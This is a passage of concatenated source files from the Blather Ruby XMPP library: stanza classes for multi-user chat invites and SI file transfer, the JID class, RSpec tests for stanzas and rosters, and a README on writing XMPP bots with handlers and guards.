end
end
end
<file_sep>/lib/blather/stanza/message/muc_user.rb
require 'blather/stanza/muc/muc_user_base'
module Blather
class Stanza
class Message
class MUCUser < Message
include Blather::Stanza::MUC::MUCUserBase
register :muc_user_message, :x, "http://jabber.org/protocol/muc#user"
def self.new(to = nil, body = nil, type = :normal)
super
end
def invite?
!!find_invite_node
end
def invite_decline?
!!find_decline_node
end
def invite
if invite = find_invite_node
Invite.new invite
else
muc_user << (invite = Invite.new nil, nil, nil, self.document)
invite
end
end
def find_invite_node
muc_user.find_first 'ns:invite', :ns => self.class.registered_ns
end
def decline
if decline = find_decline_node
Decline.new decline
else
muc_user << (decline = Decline.new nil, nil, nil, self.document)
decline
end
end
def find_decline_node
muc_user.find_first 'ns:decline', :ns => self.class.registered_ns
end
class InviteBase < XMPPNode
def self.new(element_name, to = nil, from = nil, reason = nil, document = nil)
new_node = super element_name, document
case to
when self
to.document ||= document
return to
when Nokogiri::XML::Node
new_node.inherit to
when Hash
new_node.to = to[:to]
new_node.from = to[:from]
new_node.reason = to[:reason]
else
new_node.to = to
new_node.from = from
new_node.reason = reason
end
new_node
end
def to
read_attr :to
end
def to=(val)
write_attr :to, val
end
def from
read_attr :from
end
def from=(val)
write_attr :from, val
end
def reason
reason_node.content.strip
end
def reason=(val)
reason_node.content = val
end
def reason_node
unless reason = find_first('ns:reason', :ns => MUCUser.registered_ns)
self << (reason = XMPPNode.new('reason', self.document))
end
reason
end
end
class Invite < InviteBase
def self.new(*args)
new_node = super :invite, *args
end
end
class Decline < InviteBase
def self.new(*args)
new_node = super :decline, *args
end
end
end # MUC
end # Presence
end # Stanza
end # Blather
<file_sep>/lib/blather/jid.rb
module Blather
# Jabber ID or JID
#
# See [RFC 3920 Section 3 - Addressing](http://xmpp.org/rfcs/rfc3920.html#addressing)
#
# An entity is anything that can be considered a network endpoint (i.e., an
# ID on the network) and that can communicate using XMPP. All such entities
# are uniquely addressable in a form that is consistent with RFC 2396 [URI].
# For historical reasons, the address of an XMPP entity is called a Jabber
# Identifier or JID. A valid JID contains a set of ordered elements formed
# of a domain identifier, node identifier, and resource identifier.
#
# The syntax for a JID is defined below using the Augmented Backus-Naur Form
# as defined in [ABNF]. (The IPv4address and IPv6address rules are defined
# in Appendix B of [IPv6]; the allowable character sequences that conform to
# the node rule are defined by the Nodeprep profile of [STRINGPREP] as
# documented in Appendix A of this memo; the allowable character sequences
# that conform to the resource rule are defined by the Resourceprep profile
# of [STRINGPREP] as documented in Appendix B of this memo; and the
# sub-domain rule makes reference to the concept of an internationalized
# domain label as described in [IDNA].)
#
# jid = [ node "@" ] domain [ "/" resource ]
# domain = fqdn / address-literal
# fqdn = (sub-domain 1*("." sub-domain))
# sub-domain = (internationalized domain label)
# address-literal = IPv4address / IPv6address
#
# All JIDs are based on the foregoing structure. The most common use of this
# structure is to identify an instant messaging user, the server to which
# the user connects, and the user's connected resource (e.g., a specific
# client) in the form of <user@host/resource>. However, node types other
# than clients are possible; for example, a specific chat room offered by a
# multi-user chat service could be addressed as <room@service> (where "room"
# is the name of the chat room and "service" is the hostname of the
# multi-user chat service) and a specific occupant of such a room could be
# addressed as <room@service/nick> (where "nick" is the occupant's room
# nickname). Many other JID types are possible (e.g., <domain/resource>
# could be a server-side script or service).
#
# Each allowable portion of a JID (node identifier, domain identifier, and
# resource identifier) MUST NOT be more than 1023 bytes in length, resulting
# in a maximum total size (including the '@' and '/' separators) of 3071
# bytes.
class JID
include Comparable
# Validating pattern for JID string
PATTERN = /^(?:([^@]*)@)??([^@\/]*)(?:\/(.*?))?$/.freeze
attr_reader :node,
:domain,
:resource
# @private
def self.new(node, domain = nil, resource = nil)
node.is_a?(JID) ? node : super
end
# Create a new JID object
#
# @overload initialize(jid)
# Passes the jid object right back out
# @param [Blather::JID] jid a jid object
# @overload initialize(jid)
# Creates a new JID parsed out of the provided jid
# @param [String] jid a jid in the standard format
# ("node@domain/resource")
# @overload initialize(node, domain = nil, resource = nil)
# Creates a new JID
# @param [String] node the node of the JID
# @param [String, nil] domian the domain of the JID
# @param [String, nil] resource the resource of the JID
# @raise [ArgumentError] if the parts of the JID are too large (1023 bytes)
# @return [Blather::JID] a new jid object
def initialize(node, domain = nil, resource = nil)
@resource = resource
@domain = domain
@node = node
if @domain.nil? && @resource.nil?
@node, @domain, @resource = @node.to_s.scan(PATTERN).first
end
raise ArgumentError, 'Node too long' if (@node || '').length > 1023
raise ArgumentError, 'Domain too long' if (@domain || '').length > 1023
raise ArgumentError, 'Resource too long' if (@resource || '').length > 1023
end
# Turn the JID into a string
#
# * ""
# * "domain"
# * "node@domain"
# * "domain/resource"
# * "node@domain/resource"
#
# @return [String] the JID as a string
def to_s
s = @domain
s = "#{@node}@#{s}" if @node
s = "#{s}/#{@resource}" if @resource
s
end
# Returns a new JID with resource removed.
#
# @return [Blather::JID] a new JID without a resource
def stripped
dup.strip!
end
# Removes the resource (sets it to nil)
#
# @return [Blather::JID] the JID without a resource
def strip!
@resource = nil
self
end
# Compare two JIDs, helpful for sorting etc.
#
# String representations are compared, see JID#to_s
#
# @param [#to_s] other a JID to comare against
# @return [Fixnum<-1, 0, 1>]
def <=>(other)
to_s.downcase <=> other.to_s.downcase
end
alias_method :eql?, :==
# Test if JID is stripped
#
# @return [true, false]
def stripped?
@resource.nil?
end
end # JID
end # Blather
<file_sep>/spec/blather/stanza_spec.rb
require 'spec_helper'
describe Blather::Stanza do
it 'provides .next_id helper for generating new IDs' do
expect { Blather::Stanza.next_id }.to change Blather::Stanza, :next_id
end
it 'provides a handler registration mechanism' do
class Registration < Blather::Stanza; register :handler_test, :handler, 'test:namespace'; end
expect(Registration.handler_hierarchy).to include :handler_test
expect(Blather::Stanza.handler_list).to include :handler_test
end
it 'can register based on handler' do
class RegisterHandler < Blather::Stanza; register :register_handler; end
expect(Blather::Stanza.class_from_registration(:register_handler, nil)).to eq(RegisterHandler)
end
it 'can register based on given name' do
class RegisterName < Blather::Stanza; register :handler, :registered_name; end
expect(Blather::Stanza.class_from_registration(:registered_name, nil)).to eq(RegisterName)
end
it 'can register subclass handlers' do
class SuperClassRegister < Blather::Stanza; register :super_class; end
class SubClassRegister < SuperClassRegister; register :sub_class; end
expect(SuperClassRegister.handler_hierarchy).not_to include :sub_class
expect(SubClassRegister.handler_hierarchy).to include :super_class
end
it 'can import a node' do
s = Blather::Stanza.import Blather::XMPPNode.new('foo')
expect(s.element_name).to eq('foo')
end
it 'provides an #error? helper' do
s = Blather::Stanza.new('message')
expect(s.error?).to eq(false)
s.type = :error
expect(s.error?).to eq(true)
end
it 'will generate a reply' do
s = Blather::Stanza.new('message')
s.from = f = Blather::JID.new('n@d/r')
s.to = t = Blather::JID.new('d@n/r')
r = s.reply
expect(r.object_id).not_to equal s.object_id
expect(r.from).to eq(t)
expect(r.to).to eq(f)
end
it 'convert to a reply' do
s = Blather::Stanza.new('message')
s.from = f = Blather::JID.new('n@d/r')
s.to = t = Blather::JID.new('d@n/r')
r = s.reply!
expect(r.object_id).to eq(s.object_id)
expect(r.from).to eq(t)
expect(r.to).to eq(f)
end
it 'does not remove the body when replying' do
s = Blather::Stanza.new('message')
s.from = f = Blather::JID.new('n@d/r')
s.to = t = Blather::JID.new('d@n/r')
s << Blather::XMPPNode.new('query', s.document)
r = s.reply
expect(r.children.empty?).to eq(false)
end
it 'removes the body when replying if we ask to remove it' do
s = Blather::Stanza.new('message')
s.from = f = Blather::JID.new('n@d/r')
s.to = t = Blather::JID.new('d@n/r')
s << Blather::XMPPNode.new('query', s.document)
r = s.reply :remove_children => true
expect(r.children.empty?).to eq(true)
end
it 'provides "attr_accessor" for id' do
s = Blather::Stanza.new('message')
expect(s.id).to be_nil
expect(s[:id]).to be_nil
s.id = '123'
expect(s.id).to eq('123')
expect(s[:id]).to eq('123')
end
it 'provides "attr_accessor" for to' do
s = Blather::Stanza.new('message')
expect(s.to).to be_nil
expect(s[:to]).to be_nil
s.to = Blather::JID.new('n@d/r')
expect(s.to).not_to be_nil
expect(s.to).to be_kind_of Blather::JID
expect(s[:to]).not_to be_nil
expect(s[:to]).to eq('n@d/r')
end
it 'provides "attr_accessor" for from' do
s = Blather::Stanza.new('message')
expect(s.from).to be_nil
expect(s[:from]).to be_nil
s.from = Blather::JID.new('n@d/r')
expect(s.from).not_to be_nil
expect(s.from).to be_kind_of Blather::JID
expect(s[:from]).not_to be_nil
expect(s[:from]).to eq('n@d/r')
end
it 'provides "attr_accessor" for type' do
s = Blather::Stanza.new('message')
expect(s.type).to be_nil
expect(s[:type]).to be_nil
s.type = 'testing'
expect(s.type).not_to be_nil
expect(s[:type]).not_to be_nil
end
it 'can be converted into an error by error name' do
s = Blather::Stanza.new('message')
err = s.as_error 'internal-server-error', 'cancel'
expect(err.name).to eq(:internal_server_error)
end
end
<file_sep>/spec/blather/roster_item_spec.rb
require 'spec_helper'
describe Blather::RosterItem do
it 'can be initialized with Blather::JID' do
jid = Blather::JID.new(jid)
i = Blather::RosterItem.new jid
expect(i.jid).to eq(jid)
end
it 'can be initialized with an Iq::RosterItem' do
jid = 'n@d/r'
i = Blather::RosterItem.new Blather::Stanza::Iq::Roster::RosterItem.new(jid)
expect(i.jid).to eq(Blather::JID.new(jid).stripped)
end
it 'can be initialized with a string' do
jid = 'n@d/r'
i = Blather::RosterItem.new jid
expect(i.jid).to eq(Blather::JID.new(jid).stripped)
end
it 'returns the same object when intialized with a Blather::RosterItem' do
control = Blather::RosterItem.new 'n@d/r'
expect(Blather::RosterItem.new(control)).to be control
end
it 'has a Blather::JID setter that strips the Blather::JID' do
jid = Blather::JID.new('n@d/r')
i = Blather::RosterItem.new nil
i.jid = jid
expect(i.jid).to eq(jid.stripped)
end
it 'has a subscription setter that forces a symbol' do
i = Blather::RosterItem.new nil
i.subscription = 'remove'
expect(i.subscription).to eq(:remove)
end
it 'forces the type of subscription' do
expect { Blather::RosterItem.new(nil).subscription = 'foo' }.to raise_error Blather::ArgumentError
end
it 'returns :none if the subscription field is blank' do
expect(Blather::RosterItem.new(nil).subscription).to eq(:none)
end
it 'ensure #ask is a symbol' do
i = Blather::RosterItem.new(nil)
i.ask = 'subscribe'
expect(i.ask).to eq(:subscribe)
end
it 'forces #ask to be :subscribe or nothing at all' do
expect { Blather::RosterItem.new(nil).ask = 'foo' }.to raise_error Blather::ArgumentError
end
it 'generates a stanza with #to_stanza' do
jid = Blather::JID.new('n@d/r')
i = Blather::RosterItem.new jid
s = i.to_stanza
expect(s).to be_kind_of Blather::Stanza::Iq::Roster
expect(s.items.first.jid).to eq(jid.stripped)
end
it 'returns status based on priority' do
setup_item_with_presences
expect(@i.status).to eq(@p3)
end
it 'returns status based on priority and state' do
setup_item_with_presences
@p4 = Blather::Stanza::Presence::Status.new
@p4.type = :unavailable
@p4.from = 'n@d/d'
@p4.priority = 15
@i.status = @p4
expect(@i.status).to eq(@p3)
end
it 'returns status based on resource' do
setup_item_with_presences
expect(@i.status('a')).to eq(@p)
end
def setup_item_with_presences
@jid = Blather::JID.new('n@d/r')
@i = Blather::RosterItem.new @jid
@p = Blather::Stanza::Presence::Status.new(:away)
@p.from = 'n@d/a'
@p.priority = 0
@p2 = Blather::Stanza::Presence::Status.new(:dnd)
@p2.from = 'n@d/b'
@p2.priority = -1
@p3 = Blather::Stanza::Presence::Status.new(:dnd)
@p3.from = 'n@d/c'
@p3.priority = 10
@i.status = @p
@i.status = @p2
@i.status = @p3
end
it 'removes old unavailable presences' do
setup_item_with_presences
50.times do |i|
p = Blather::Stanza::Presence::Status.new
p.type = :unavailable
p.from = "n@d/#{i}"
@i.status = p
end
expect(@i.statuses.size).to eq(4)
end
it 'initializes groups to [nil] if the item is not part of a group' do
i = Blather::RosterItem.new 'n@d'
expect(i.groups).to eq([nil])
end
it 'can determine equality' do
item1 = Blather::RosterItem.new 'n@d'
item2 = Blather::RosterItem.new 'n@d'
item1.groups = %w[group1 group2]
item2.groups = %w[group1 group2]
expect(item1 == item2).to eq(true)
end
end
<file_sep>/spec/blather/roster_spec.rb
require 'spec_helper'
describe Blather::Roster do
before do
@stream = mock()
@stream.stubs(:write)
@stanza = mock()
items = 4.times.map { |n| Blather::Stanza::Iq::Roster::RosterItem.new(jid: "n@d/#{n}r") }
@stanza.stubs(:items).returns(items)
@stanza.stubs(:version).returns('24d091d0dcfab1b3')
@roster = Blather::Roster.new(@stream, @stanza)
end
it 'initializes with items' do
expect(@roster.items.map { |_,i| i.jid.to_s }).to eq(@stanza.items.map { |i| i.jid.stripped.to_s }.uniq)
end
it 'processes @stanzas with remove requests' do
s = @roster['n@d/0r']
s.subscription = :remove
expect { @roster.process(s.to_stanza) }.to change(@roster, :length).by -1
end
it 'processes @stanzas with add requests' do
s = Blather::Stanza::Iq::Roster::RosterItem.new('a@b/c').to_stanza
expect { @roster.process(s) }.to change(@roster, :length).by 1
end
it 'allows a jid to be pushed' do
jid = 'a@b/c'
expect { @roster.push(jid) }.to change(@roster, :length).by 1
expect(@roster[jid]).not_to be_nil
end
it 'allows an item to be pushed' do
jid = 'a@b/c'
item = Blather::RosterItem.new(Blather::JID.new(jid))
expect { @roster.push(item) }.to change(@roster, :length).by 1
expect(@roster[jid]).not_to be_nil
end
it 'aliases #<< to #push and returns self to allow for chaining' do
jid = 'a@b/c'
item = Blather::RosterItem.new(Blather::JID.new(jid))
jid2 = 'd@e/f'
item2 = Blather::RosterItem.new(Blather::JID.new(jid2))
expect { @roster << item << item2 }.to change(@roster, :length).by 2
expect(@roster[jid]).not_to be_nil
expect(@roster[jid2]).not_to be_nil
end
it 'sends a @roster addition over the wire' do
client = mock(:write => nil)
roster = Blather::Roster.new client, @stanza
roster.push('a@b/c')
end
it 'removes a Blather::JID' do
expect { @roster.delete 'n@d' }.to change(@roster, :length).by -1
end
it 'sends a @roster removal over the wire' do
client = mock(:write => nil)
roster = Blather::Roster.new client, @stanza
roster.delete('a@b/c')
end
it 'returns an item through []' do
item = @roster['n@d']
expect(item).to be_kind_of Blather::RosterItem
expect(item.jid).to eq(Blather::JID.new('n@d'))
end
it 'responds to #each' do
expect(@roster).to respond_to :each
end
it 'cycles through all the items using #each' do
expect(@roster.map { |i| i }.sort).to eq(@roster.items.values.sort)
end
it 'yields RosterItems from #each' do
@roster.map { |i| expect(i).to be_kind_of Blather::RosterItem }
end
it 'returns a duplicate of items through #items' do
items = @roster.items
items.delete 'n@d'
expect(items).not_to equal @roster.items
end
it 'will group roster items' do
@roster.delete 'n@d'
item1 = Blather::RosterItem.new("n1@d")
item1.groups = ['group1', 'group2']
item2 = Blather::RosterItem.new("n2@d")
item2.groups = ['group1', 'group3']
@roster << item1 << item2
expect(@roster.grouped).to eq({
'group1' => [item1, item2],
'group2' => [item1],
'group3' => [item2]
})
end
it 'has a version' do
expect(@roster.version).to eq @stanza.version
end
end
<file_sep>/lib/blather/stanza/iq/si.rb
require 'time' # For Time#xmlschema
module Blather
class Stanza
class Iq
# # Si Stanza
#
# [XEP-0096: SI File Transfer](http://xmpp.org/extensions/xep-0096.html)
#
# This is a base class for any si based Iq stanzas. It provides a base set
# of methods for working with si stanzas
#
# @example Basic file transfer acceptance
# client.register_handler :file_transfer do |iq|
# transfer = Blather::FileTransfer.new(client, iq)
# transfer.accept(Blather::FileTransfer::SimpleFileReceiver, "/path/to/#{iq.si.file["name"]}", iq.si.file["size"].to_i)
# end
#
# @example Basic file transfer refusal
# client.register_handler :file_transfer do |iq|
# transfer = Blather::FileTransfer.new(client, iq)
# transfer.decline
# end
#
# @example File transfer acceptance by in-band bytestreams with custom handler
# client.register_handler :file_transfer do |iq|
# transfer = Blather::FileTransfer.new(client, iq)
# transfer.allow_ibb = true
# transfer.allow_s5b = false
# transfer.accept(MyFileReceiver, iq)
# end
#
# @handler :file_transfer
class Si < Iq
# @private
NS_SI = 'http://jabber.org/protocol/si'
register :file_transfer, :si, NS_SI
# Overrides the parent method to ensure a si node is created
#
# @see Blather::Stanza::Iq.new
def self.new(type = :set)
node = super
node.si
node
end
# Overrides the parent method to ensure the current si node is destroyed
#
# @see Blather::Stanza::Iq#inherit
def inherit(node)
si.remove
super
end
# Find or create si node
#
# @return [Si::Si]
def si
Si.find_or_create self
end
# Replaces si node
#
# @param [Si::Si, XML::Node] node the stanza's new si node
#
# @return [Si::Si]
def si=(node)
si.remove
self << node
Si.find_or_create self
end
# Overrides the parent method to ensure the current si node is destroyed
#
# @see Blather::Stanza#reply
def reply
reply = Stanza::Iq::Si.import super
reply.si.remove
reply
end
# Si stanza fragment
class Si < XMPPNode
# Create a new Si::Si object
#
# @param [XML::Node, nil] node a node to inherit from
#
# @return [Si::Si]
def self.new(node = nil)
new_node = super :si
new_node.namespace = NS_SI
new_node.inherit node if node
new_node
end
# Find or create si node in Si Iq and converts it to Si::Si
#
# @param [Si] parent a Si Iq where to find or create si
#
# @return [Si::Si]
def self.find_or_create(parent)
if found_si = parent.find_first('//ns:si', :ns => NS_SI)
si = self.new found_si
found_si.remove
else
si = self.new
end
parent << si
si
end
# Get the id of the stream
#
# @return [String, nil]
def id
read_attr :id
end
# Set the id
#
# @param [String, nil] id the id of the stream
def id=(id)
write_attr :id, id
end
# Get the MIME type of the stream
#
# @return [String, nil]
def mime_type
read_attr 'mime-type'
end
# Set the MIME type
#
# @param [String, nil] type the MIME type of the stream
def mime_type=(type)
write_attr 'mime-type', type
end
# Get the profile of the stream
#
# @return [String, nil]
def profile
read_attr :profile
end
# Set the profile
#
# @param [String, nil] profile the profile of the stream
def profile=(profile)
write_attr :profile, profile
end
# Find or create file node
#
# @return [Si::Si::File]
def file
File.find_or_create self
end
# Find or create feature node
#
# @return [Si::Si::Feature]
def feature
Feature.find_or_create self
end
# Feature stanza fragment
class Feature < XMPPNode
register :feature, 'http://jabber.org/protocol/feature-neg'
# Create a new Si::Si::Feature object
#
# @param [XML::Node, nil] node a node to inherit from
#
# @return [Si::Si::Feature]
def self.new(node = nil)
new_node = super :feature
new_node.namespace = self.registered_ns
new_node.inherit node if node
new_node
end
# Find or create feature node in si node and converts it to Si::Si::Feature
#
# @param [Si::Si] parent a si node where to find or create feature
#
# @return [Si::Si::Feature]
def self.find_or_create(parent)
if found_feature = parent.find_first('//ns:feature', :ns => self.registered_ns)
feature = self.new found_feature
found_feature.remove
else
feature = self.new
end
parent << feature
feature
end
# Find or create x node
#
# @return [Stanza::X]
def x
Stanza::X.find_or_create self
end
end
# File stanza fragment
class File < XMPPNode
register :file, 'http://jabber.org/protocol/si/profile/file-transfer'
# Create a new Si::Si::File object
#
# @param [XML::Node, nil] node a node to inherit from
#
# @return [Si::Si::File]
def self.new(name = nil, size = nil)
new_node = super :file
case name
when Nokogiri::XML::Node
new_node.inherit name
else
new_node.name = name
new_node.size = size
end
new_node
end
# Find or create file node in si node and converts it to Si::Si::File
#
# @param [Si::Si] parent a si node where to find or create file
#
# @return [Si::Si::File]
def self.find_or_create(parent)
if found_file = parent.find_first('//ns:file', :ns => self.registered_ns)
file = self.new found_file
found_file.remove
else
file = self.new
end
parent << file
file
end
# Get the filename
#
# @return [String, nil]
def name
read_attr :name
end
# Set the filename
#
# @param [String, nil] name the name of the file
def name=(name)
write_attr :name, name
end
# Get the hash
#
# @return [String, nil]
def hash
read_attr :hash
end
# Set the hash
#
# @param [String, nil] hash the MD5 hash of the file
def hash=(hash)
write_attr :hash, hash
end
# Get the date
#
# @return [Time, nil]
def date
begin
Time.xmlschema(read_attr(:date))
rescue ArgumentError
nil
end
end
# Set the date
#
# @param [Time, nil] date the last modification time of the file
def date=(date)
write_attr :date, (date ? date.xmlschema : nil)
end
# Get the size
#
# @return [Fixnum, nil]
def size
if (s = read_attr(:size)) && (s =~ /^\d+$/)
s.to_i
else
nil
end
end
# Set the size
#
# @param [Fixnum, nil] size the size, in bytes, of the file
def size=(size)
write_attr :size, size
end
# Get the desc
#
# @return [String, nil]
def desc
content_from 'ns:desc', :ns => self.class.registered_ns
end
# Set the desc
#
# @param [String, nil] desc the description of the file
def desc=(desc)
set_content_for :desc, desc
end
# Find or create range node
#
# @return [Si::Si::File::Range]
def range
Range.find_or_create self
end
end
# Range stanza fragment
class Range < XMPPNode
register :range, 'http://jabber.org/protocol/si/profile/file-transfer'
# Create a new Si::Si::File::Range object
#
# @param [XML::Node, nil] node a node to inherit from
#
# @return [Si::Si::File::Range]
def self.new(offset = nil, length = nil)
new_node = super :range
case offset
when Nokogiri::XML::Node
new_node.inherit offset
else
new_node.offset = offset
new_node.length = length
end
new_node
end
# Find or create range node in file node and converts it to Si::Si::File::Range
#
# @param [Si::Si::File] parent a file node where to find or create range
#
# @return [Si::Si::File::Range]
def self.find_or_create(parent)
if found_range = parent.find_first('//ns:range', :ns => self.registered_ns)
range = self.new found_range
found_range.remove
else
range = self.new
end
parent << range
range
end
# Get the offset
#
# @return [Fixnum, nil]
def offset
if (o = read_attr(:offset)) && (o =~ /^\d+$/)
o.to_i
else
nil
end
end
# Set the offset
#
# @param [Fixnum, nil] offset the position, in bytes, to start transferring the file data from
def offset=(offset)
write_attr :offset, offset
end
# Get the length
#
# @return [Fixnum, nil]
def length
if (l = read_attr(:length)) && (l =~ /^\d+$/)
l.to_i
else
nil
end
end
# Set the length
#
# @param [Fixnum, nil] length the number of bytes to retrieve starting at offset
def length=(length)
write_attr :length, length
end
end
end
end
end
end
end
<file_sep>/README.md
# Blather
[](https://rubygems.org/gems/blather)
[](http://travis-ci.org/adhearsion/blather)
[](https://gemnasium.com/adhearsion/blather)
[](https://codeclimate.com/github/adhearsion/blather)
[](https://coveralls.io/r/adhearsion/blather)
[](http://inch-ci.org/github/adhearsion/blather)
XMPP DSL (and more) for Ruby written on [EventMachine](http://rubyeventmachine.com/) and [Nokogiri](http://nokogiri.org/).
`develop` branch contains breaking changes scheduled for release in v3.0.0
## Features
* evented architecture
* uses Nokogiri
* simplified starting point
## Project Pages
* [GitHub](https://github.com/adhearsion/blather)
* [Rubygems](http://rubygems.org/gems/blather)
* [API Documentation](http://rdoc.info/gems/blather/file/README.md)
* [Google Group](http://groups.google.com/group/xmpp-blather)
# Usage
## Installation
gem install blather
## Example
Blather comes with a DSL that makes writing XMPP bots quick and easy. See the examples directory for more advanced examples.
```ruby
require 'blather/client'
setup '<EMAIL>', 'echo'
# Auto approve subscription requests
subscription :request? do |s|
write_to_stream s.approve!
end
# Echo back what was said
message :chat?, :body do |m|
write_to_stream m.reply
end
```
The above example is for a standalone script, and [can be run as a command line program](https://github.com/adhearsion/blather#on-the-command-line). If you wish to integrate Blather into an existing application, you will need to avoid `blather/client` and instead do something like this:
```ruby
require 'blather/client/dsl'
module App
extend Blather::DSL
def self.run
EM.run { client.run }
end
setup '<EMAIL>', 'echo'
# Auto approve subscription requests
subscription :request? do |s|
write_to_stream s.approve!
end
# Echo back what was said
message :chat?, :body do |m|
write_to_stream m.reply
end
end
trap(:INT) { EM.stop }
trap(:TERM) { EM.stop }
App.run
```
If you need to ensure that Blather does not block the rest of your application, run the reactor in a new thread:
```ruby
Thread.new { App.run }
```
You can additionally send messages like so:
```ruby
App.say '<EMAIL>', 'Hello there!'
```
## Handlers
Handlers let Blather know how you'd like each type of stanza to be well.. handled. Each type of stanza has an associated handler which is part of a handler hierarchy. In the example above we're handling message and subscription stanzas.
XMPP is built on top of three main stanza types (presence, message, and iq). All other stanzas are built on these three base types. This creates a natural hierarchy of handlers. For example a subscription stanza is a type of presence stanza and can be processed by a subscription handler or a presence handler. Likewise, a PubSub::Items stanza has its own identifier :pubsub_items but it's also a :pubsub_node, :iq and :staza. Any or each of these could be used to handle the PubSub::Items stanza. If you've done any DOM programming you'll be familiar with this.
Incoming stanzas will be handled by the first handler found. Unlike the DOM this will stop the handling bubble unless the handler returns false.
The entire handler hierarchy can be seen below.
### Example
Here we have a presence handler and a subscription handler. When this script receives a subscription stanza the subscription handler will be notified first. If that handler doesn't know what to do it can return false and let the stanza bubble up to the presence handler.
```ruby
# Handle all presence stanzas
presence do |stanza|
# do stuff
end
# Handle all subscription stanzas
subscription do |stanza|
# do stuff
end
```
Additionally, handlers may be 'guarded'. That is, they may have conditions set declaratively, against which the stanza must match in order to trigger the handler.
```ruby
# Will only be called for messages where #chat? responds positively
# and #body == 'exit'
message :chat?, :body => 'exit'
```
### Non-Stanza Handlers
So far there are two non-stanza related handlers.
```ruby
# Called after the connection has been connected. It's good for initializing
# your system.
# DSL:
when_ready {}
# Client:
client.register_handler(:ready) {}
# Called after the connection has been terminated. Good for teardown or
# automatic reconnection.
# DSL:
disconnected {}
# Client
client.register_handler(:disconnected) {}
# The following will reconnect every time the connection is lost:
disconnected { client.connect }
```
### Handler Guards
Guards are a concept borrowed from Erlang. They help to better compartmentalize handlers.
There are a number of guard types and one bit of special syntax. Guards act like AND statements. Each condition must be met if the handler is to
be used.
```ruby
# Equivalent to saying (stanza.chat? && stanza.body)
message :chat?, :body
```
The different types of guards are:
```ruby
# Symbol
# Checks for a non-false reply to calling the symbol on the stanza
# Equivalent to stanza.chat?
message :chat?
# Hash with any value (:body => 'exit')
# Calls the key on the stanza and checks for equality
# Equivalent to stanza.body == 'exit'
message :body => 'exit'
# Hash with regular expression (:body => /exit/)
# Calls the key on the stanza and checks for a match
# Equivalent to stanza.body.match /exit/
message :body => /exit/
# Hash with array (:name => [:gone, :forbidden])
# Calls the key on the stanza and check for inclusion in the array
# Equivalent to [:gone, :forbidden].include?(stanza.name)
stanza_error :name => [:gone, :fobidden]
# Proc
# Calls the proc passing in the stanza
# Checks that the ID is modulo 3
message proc { |m| m.id % 3 == 0 }
# Array
# Use arrays with the previous types effectively turns the guard into
# an OR statement.
# Equivalent to stanza.body == 'foo' || stanza.body == 'baz'
message [{:body => 'foo'}, {:body => 'baz'}]
# XPath
# Runs the xpath query on the stanza and checks for results
# This guard type cannot be combined with other guards
# Equivalent to !stanza.find('/iq/ns:pubsub', :ns => 'pubsub:namespace').empty?
# It also passes two arguments into the handler block: the stanza and the result
# of the xpath query.
iq '/iq/ns:pubsub', :ns => 'pubsub:namespace' do |stanza, xpath_result|
# stanza will be the original stanza
# xpath_result will be the pubsub node in the stanza
end
```
### Filters
Blather provides before and after filters that work much the way regular
handlers work. Filters come in a before and after flavor. They're called in
order of definition and can be guarded like handlers.
```ruby
before { |s| "I'm run before any handler" }
before { |s| "I'm run next" }
before(:message) { |s| "I'm only run in front of message stanzas" }
before(nil, :id => 1) { |s| "I'll only be run when the stanza's ID == 1" }
# ... handlers
after { |s| "I'm run after everything" }
```
### Handlers Hierarchy
```
stanza
|- iq
| |- pubsub_node
| | |- pubsub_affiliations
| | |- pubsub_create
| | |- pubsub_items
| | |- pubsub_publish
| | |- pubsub_retract
| | |- pubsub_subscribe
| | |- pubsub_subscription
| | |- pubsub_subscriptions
| | `- pubsub_unsubscribe
| |- pubsub_owner
| | |- pubsub_delete
| | `- pubsub_purge
| `- query
| |- disco_info
| |- disco_items
| `- roster
|- message
| `- pubsub_event
`- presence
|- status
`- subscription
error
|- argument_error
|- parse_error
|- sasl_error
|- sasl_unknown_mechanism
|- stanza_error
|- stream_error
|- tls_failure
`- unknown_response_error
```
## On the Command Line
Default usage is:
```
[blather_script] [options] node@domain.com/resource password [host] [port]
```
Command line options:
```
-D, --debug Run in debug mode (you will see all XMPP communication)
-d, --daemonize Daemonize the process
--pid=[PID] Write the PID to this file
--log=[LOG] Write to the [LOG] file instead of stdout/stderr
-h, --help Show this message
-v, --version Show version
```
## Health warning
Some parts of Blather will allow you to do stupid things that don't conform to XMPP
spec. You should exercise caution and read the relevant specifications (indicated in
the preamble to most relevant classes).
## Spec compliance
Blather provides support in one way or another for many XMPP specifications. Below is a list of specifications and the status of support for them in Blather. This list *may not be correct*. If the list indicates a lack of support for a specification you wish to use, you are encouraged to check that this is correct. Likewise, if you find an overstatement of Blather's spec compliance, please point this out. Also note that even without built-in support for a specification, you can still manually construct and parse stanzas alongside use of Blather's built-in helpers.
Specification | Support | Name | Notes
---------------------------------------------------- | ------- | ---- | -----
[RFC 6120](http://tools.ietf.org/html/rfc6120) | Full | XMPP: Core |
[RFC 6121](http://tools.ietf.org/html/rfc6121) | Full | XMPP: Instant Messaging and Presence |
[RFC 6122](http://tools.ietf.org/html/rfc6122) | Full | XMPP: Address Format |
[XEP-0001](http://xmpp.org/extensions/xep-0001.html) | N/A | XMPP Extension Protocols |
[XEP-0002](http://xmpp.org/extensions/xep-0002.html) | N/A | Special Interest Groups (SIGs) |
[XEP-0004](http://xmpp.org/extensions/xep-0004.html) | Partial | Data Forms |
[XEP-0009](http://xmpp.org/extensions/xep-0009.html) | None | Jabber-RPC |
[XEP-0012](http://xmpp.org/extensions/xep-0012.html) | None | Last Activity |
[XEP-0013](http://xmpp.org/extensions/xep-0013.html) | None | Flexible Offline Message Retrieval |
[XEP-0016](http://xmpp.org/extensions/xep-0016.html) | None | Privacy Lists |
[XEP-0019](http://xmpp.org/extensions/xep-0019.html) | N/A | Streamlining the SIGs |
[XEP-0020](http://xmpp.org/extensions/xep-0020.html) | Partial | Feature Negotiation |
[XEP-0027](http://xmpp.org/extensions/xep-0027.html) | None | Current Jabber OpenPGP Usage |
[XEP-0030](http://xmpp.org/extensions/xep-0030.html) | Partial | Service Discovery |
[XEP-0033](http://xmpp.org/extensions/xep-0033.html) | None | Extended Stanza Addressing |
[XEP-0045](http://xmpp.org/extensions/xep-0045.html) | Partial | Multi-User Chat |
[XEP-0047](http://xmpp.org/extensions/xep-0047.html) | None | In-Band Bytestreams |
[XEP-0048](http://xmpp.org/extensions/xep-0048.html) | None | Bookmarks |
[XEP-0049](http://xmpp.org/extensions/xep-0049.html) | None | Private XML Storage |
[XEP-0050](http://xmpp.org/extensions/xep-0050.html) | Partial | Ad-Hoc Commands |
